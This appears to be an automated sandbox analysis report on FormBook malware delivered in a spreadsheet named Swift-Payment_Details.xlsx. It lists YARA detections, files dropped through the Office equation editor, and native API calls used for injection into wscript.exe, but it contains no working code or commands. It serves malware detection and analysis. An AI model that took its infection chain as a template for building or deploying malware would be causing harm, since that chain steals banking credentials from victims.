Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.270000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2372146998.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2372100550.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2158065205.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000001.2156137275.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2201997636.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2201775977.0000000000260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2371920280.0000000000070000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2202517740.0000000000530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 7_2_004181D0 NtCreateFile,		7_2_004181D0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00418280 NtReadFile,		7_2_00418280
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00418300 NtClose,		7_2_00418300
Source: C:\Users\Public\vbc.exe	Code function: 7_2_004183B0 NtAllocateVirtualMemory,		7_2_004183B0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00418222 NtCreateFile,		7_2_00418222
Source: C:\Users\Public\vbc.exe	Code function: 7_2_004183AA NtAllocateVirtualMemory,		7_2_004183AA
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009600C4 NtCreateFile,LdrInitializeThunk,		7_2_009600C4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00960048 NtProtectVirtualMemory,LdrInitializeThunk,		7_2_00960048
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00960078 NtResumeThread,LdrInitializeThunk,		7_2_00960078
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009607AC NtCreateMutant,LdrInitializeThunk,		7_2_009607AC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095F9F0 NtClose,LdrInitializeThunk,		7_2_0095F9F0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095F900 NtReadFile,LdrInitializeThunk,		7_2_0095F900
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		7_2_0095FAD0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FAE8 NtQueryInformationProcess,LdrInitializeThunk,		7_2_0095FAE8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FBB8 NtQueryInformationToken,LdrInitializeThunk,		7_2_0095FBB8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FB68 NtFreeVirtualMemory,LdrInitializeThunk,		7_2_0095FB68
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FC90 NtUnmapViewOfSection,LdrInitializeThunk,		7_2_0095FC90
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FC60 NtMapViewOfSection,LdrInitializeThunk,		7_2_0095FC60
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FD8C NtDelayExecution,LdrInitializeThunk,		7_2_0095FD8C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FDC0 NtQuerySystemInformation,LdrInitializeThunk,		7_2_0095FDC0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FEA0 NtReadVirtualMemory,LdrInitializeThunk,		7_2_0095FEA0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		7_2_0095FED0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FFB4 NtCreateSection,LdrInitializeThunk,		7_2_0095FFB4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009610D0 NtOpenProcessToken,		7_2_009610D0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00960060 NtQuerySection,		7_2_00960060
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009601D4 NtSetValueKey,		7_2_009601D4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0096010C NtOpenDirectoryObject,		7_2_0096010C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00961148 NtOpenThread,		7_2_00961148
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095F8CC NtWaitForSingleObject,		7_2_0095F8CC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00961930 NtSetContextThread,		7_2_00961930
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095F938 NtWriteFile,		7_2_0095F938
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FAB8 NtQueryValueKey,		7_2_0095FAB8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FA20 NtQueryInformationFile,		7_2_0095FA20
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FA50 NtEnumerateValueKey,		7_2_0095FA50
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095FBE8 NtQueryVirtualMemory,		7_2_0095FBE8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024300C4 NtCreateFile,LdrInitializeThunk,		9_2_024300C4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024307AC NtCreateMutant,LdrInitializeThunk,		9_2_024307AC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		9_2_0242FAD0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FAE8 NtQueryInformationProcess,LdrInitializeThunk,		9_2_0242FAE8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FAB8 NtQueryValueKey,LdrInitializeThunk,		9_2_0242FAB8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FB50 NtCreateKey,LdrInitializeThunk,		9_2_0242FB50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FB68 NtFreeVirtualMemory,LdrInitializeThunk,		9_2_0242FB68
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FBB8 NtQueryInformationToken,LdrInitializeThunk,		9_2_0242FBB8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242F900 NtReadFile,LdrInitializeThunk,		9_2_0242F900
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242F9F0 NtClose,LdrInitializeThunk,		9_2_0242F9F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		9_2_0242FED0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FFB4 NtCreateSection,LdrInitializeThunk,		9_2_0242FFB4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FC60 NtMapViewOfSection,LdrInitializeThunk,		9_2_0242FC60
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FDC0 NtQuerySystemInformation,LdrInitializeThunk,		9_2_0242FDC0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FD8C NtDelayExecution,LdrInitializeThunk,		9_2_0242FD8C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02430048 NtProtectVirtualMemory,		9_2_02430048
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02430060 NtQuerySection,		9_2_02430060
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02430078 NtResumeThread,		9_2_02430078
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024310D0 NtOpenProcessToken,		9_2_024310D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02431148 NtOpenThread,		9_2_02431148
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0243010C NtOpenDirectoryObject,		9_2_0243010C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024301D4 NtSetValueKey,		9_2_024301D4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FA50 NtEnumerateValueKey,		9_2_0242FA50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FA20 NtQueryInformationFile,		9_2_0242FA20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FBE8 NtQueryVirtualMemory,		9_2_0242FBE8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242F8CC NtWaitForSingleObject,		9_2_0242F8CC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02431930 NtSetContextThread,		9_2_02431930
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242F938 NtWriteFile,		9_2_0242F938
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FE24 NtWriteVirtualMemory,		9_2_0242FE24
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FEA0 NtReadVirtualMemory,		9_2_0242FEA0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FF34 NtQueueApcThread,		9_2_0242FF34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FFFC NtCreateProcessEx,		9_2_0242FFFC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02430C40 NtGetContextThread,		9_2_02430C40
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FC48 NtSetInformationFile,		9_2_0242FC48
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FC30 NtOpenProcess,		9_2_0242FC30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FC90 NtUnmapViewOfSection,		9_2_0242FC90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0242FD5C NtEnumerateKey,		9_2_0242FD5C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02431D80 NtSuspendThread,		9_2_02431D80
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_000881D0 NtCreateFile,		9_2_000881D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00088280 NtReadFile,		9_2_00088280
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00088300 NtClose,		9_2_00088300
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_000883B0 NtAllocateVirtualMemory,		9_2_000883B0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00088222 NtCreateFile,		9_2_00088222
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_000883AA NtAllocateVirtualMemory,		9_2_000883AA

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 7_2_0040102E		7_2_0040102E
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00401030		7_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B8FB		7_2_0041B8FB
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00408C6C		7_2_00408C6C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00408C70		7_2_00408C70
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B57A		7_2_0041B57A
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402D88		7_2_00402D88
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041C58A		7_2_0041C58A
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402D90		7_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402FB0		7_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0096E0C6		7_2_0096E0C6
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0099D005		7_2_0099D005
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0098905A		7_2_0098905A
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00973040		7_2_00973040
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0096E2E9		7_2_0096E2E9
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A11238		7_2_00A11238
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009963DB		7_2_009963DB
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0096F3CF		7_2_0096F3CF
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00972305		7_2_00972305
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00977353		7_2_00977353
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009BA37B		7_2_009BA37B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00981489		7_2_00981489
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009A5485		7_2_009A5485
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0098C5F0		7_2_0098C5F0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0097351F		7_2_0097351F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00974680		7_2_00974680
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0097E6C1		7_2_0097E6C1
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A12622		7_2_00A12622
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009F579A		7_2_009F579A
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0097C7BC		7_2_0097C7BC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009A57C3		7_2_009A57C3
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A0F8EE		7_2_00A0F8EE
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0097C85C		7_2_0097C85C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0099286D		7_2_0099286D
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009729B2		7_2_009729B2
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A1098E		7_2_00A1098E
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009869FE		7_2_009869FE
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009F5955		7_2_009F5955
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A23A83		7_2_00A23A83
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A1CBA4		7_2_00A1CBA4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0096FBD7		7_2_0096FBD7
Source: C:\Users\Public\vbc.exe	Code function: 7_2_009FDBDA		7_2_009FDBDA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024E1238		9_2_024E1238
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0243E2E9		9_2_0243E2E9
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02447353		9_2_02447353
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0248A37B		9_2_0248A37B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02442305		9_2_02442305
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0243F3CF		9_2_0243F3CF
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024663DB		9_2_024663DB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02443040		9_2_02443040
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0245905A		9_2_0245905A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0246D005		9_2_0246D005
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0243E0C6		9_2_0243E0C6
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024E2622		9_2_024E2622
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0244E6C1		9_2_0244E6C1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02444680		9_2_02444680
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024757C3		9_2_024757C3
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024C579A		9_2_024C579A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0244C7BC		9_2_0244C7BC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02475485		9_2_02475485
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02451489		9_2_02451489
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0244351F		9_2_0244351F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0245C5F0		9_2_0245C5F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024F3A83		9_2_024F3A83
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02467B00		9_2_02467B00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0243FBD7		9_2_0243FBD7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024CDBDA		9_2_024CDBDA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024ECBA4		9_2_024ECBA4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0244C85C		9_2_0244C85C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0246286D		9_2_0246286D
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024DF8EE		9_2_024DF8EE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024C5955		9_2_024C5955
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024569FE		9_2_024569FE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024E098E		9_2_024E098E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024429B2		9_2_024429B2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0245EE4C		9_2_0245EE4C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02472E2F		9_2_02472E2F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0246DF7C		9_2_0246DF7C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02450F3F		9_2_02450F3F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0244CD5B		9_2_0244CD5B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_02470D3B		9_2_02470D3B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_024DFDDD		9_2_024DFDDD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0008B57A		9_2_0008B57A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0008C58A		9_2_0008C58A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_0008B8FB		9_2_0008B8FB
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00078C6C		9_2_00078C6C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00078C70		9_2_00078C70
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00072D88		9_2_00072D88
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00072D90		9_2_00072D90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 9_2_00072FB0		9_2_00072FB0

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Swift-Payment_Details.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe	Code function: String function: 009B3F92 appears 71 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 009B373B appears 177 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0096DF5C appears 83 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0096E2A8 appears 31 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 009DF970 appears 59 times
Source: C:\Windows\SysWOW64\wscript.exe	Code function: String function: 0243E2A8 appears 38 times
Source: C:\Windows\SysWOW64\wscript.exe	Code function: String function: 0248373B appears 238 times
Source: C:\Windows\SysWOW64\wscript.exe	Code function: String function: 02483F92 appears 108 times
Source: C:\Windows\SysWOW64\wscript.exe	Code function: String function: 0243DF5C appears 107 times
Source: C:\Windows\SysWOW64\wscript.exe	Code function: String function: 024AF970 appears 81 times

Yara signature match

